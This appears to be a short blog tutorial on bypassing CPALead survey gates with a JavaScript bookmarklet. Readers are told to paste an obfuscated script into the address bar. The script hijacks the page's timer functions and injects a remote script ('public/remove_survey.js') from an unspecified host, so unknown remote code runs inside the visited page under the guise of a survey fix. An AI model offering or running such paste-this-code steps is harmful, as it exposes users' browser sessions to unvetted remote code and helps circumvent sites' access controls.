How To Remove CPALead Surveys 100% Working (Revealed)

How To Remove CPALead Surveys 100% Working (Revealed)

In this tutorial I will show you how to remove CPALead surveys. Sometimes if you search on google for something, and you find it it may require to do a survey, but it may not be avaible. So here's a way to remove it and continue browsing.
1) Find a website which requires to do CPALead in order to browse the website.

2) Paste the following code in your address bar (you must have enabled javascript in order this to work):
javascript:(function(){(function(){var z=["Timeout","Interval"];for(var i=0;i<1;i++){var x=window["set"+z[i]]("null",1);for(var j=x;j>0&&x-j<99;j--)window["clear"+z[i]](j);}})();var gn=function(){var q=function(min,max){return Math.floor(Math.random()*(max-min+1))+min;};var n="";for(var r=0;r<q(9,19);r++)n+=String.fromCharCode(q(97,122));return n;};var tmrs=["Timeout","Interval"];var bl=[];var xc=[];for(var i=0;i<2;i++){bl.push(window["set"+tmrs[i]]);window["set"+tmrs[i]]=function(a,b){};for(var j in window){try{if(typeof(window[j])=="function"){if((window[j]+"").indexOf("function set"+tmrs[i]+"() {")!=-1)window[j]=function(a,b){};}}catch(e){}}var op=gn();xc.push(op);window[op]=bl[i];}var er=gn();window[er]=function(){window.setTimeout=bl[0];window.setInterval=bl[1];xjz={version:1.1,domain:"",id:"4c3e4ab2b7d6f",TO:setTimeout("alert(\"It appears that host could not be reached :(\\nPlease try to use the bookmarklet again later!\\n\"+xjz.domain);",10000)};var a=document.createElement("script");a.type="text/javascript";a.src=xjz.domain+"public/remove_survey.js";document.documentElement.firstChild.appendChild(a);};window[xc[0]](window[er],1100);})();

3) The CPALead survey has been removed. Smile


You could add the javascript into your bookmarks for faster and easily use. If you find a website which require CPALead survey, just open the bookmard and it's gone.

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